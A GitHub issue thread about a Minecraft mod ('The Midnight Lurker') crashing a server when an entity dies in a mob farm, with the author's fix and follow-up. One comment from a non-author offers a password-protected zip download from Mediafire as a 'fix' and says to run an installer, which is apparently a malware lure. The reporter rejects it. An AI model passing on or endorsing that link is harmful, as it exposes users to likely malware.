### ISSUE TITLE
Repeated server crashes when the midnight lurker dies by spawning in a mob farm.

### ISSUE THREAD

**Issue by Gregorsharpe** [Voxla/midnightlurker#26]
Per title, I added TML to a small modpack with some friends and we found that when the lurker (specifically MidnightLurkerBackturnedEntity) spawns in a mob farm and dies (in this case to fall damage aided by dripstone) the server reliably crashes when trying to tick the entity.

I've tested this on MC 1.20.1, Forge 47.3.5 with TML versions 3.2.10 and 3.2.6.

[crash-2024-08-26_10.13.50-server.txt](https://github.com/user-attachments/files/16749805/crash-2024-08-26_10.13.50-server.txt)

Happy to provide any additional information requested, though for the time being we've had to disable the mod.

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gregorsharpe** [comment]
While I don't mean to be rude, downloading an encoded zip file and running an executable from a stranger is a non-starter. Doubly so given that you're not the mod author.

**Comment by Voxla** [comment]
This should be fixed now (in version 3.3.3), so if you ever get around to reinstalling the mod, do let me know if the problem still occurs.

I also tested this while updating the mod, and it seems to not crash, though I could be doing something wrong while trying to get it to crash.
![lurkerdyingtodripstone](https://github.com/user-attachments/assets/3a9e8406-269c-4765-aaa5-e5dd658bdae3)

**Comment by Gregorsharpe** [comment]
Thank you very much for addressing the issue so promptly! I reinstalled the mod this morning on the server to test it, but it seems the issue persists. That said given your testing showing no signs of instability, I strongly suspect the problem is on our end with some of the more unstable mixins required by other "horror" themed mods in the pack. (Sinytra Connector being chief among them.)

Feel free to close this one off, and thanks again for making such a cool mod!
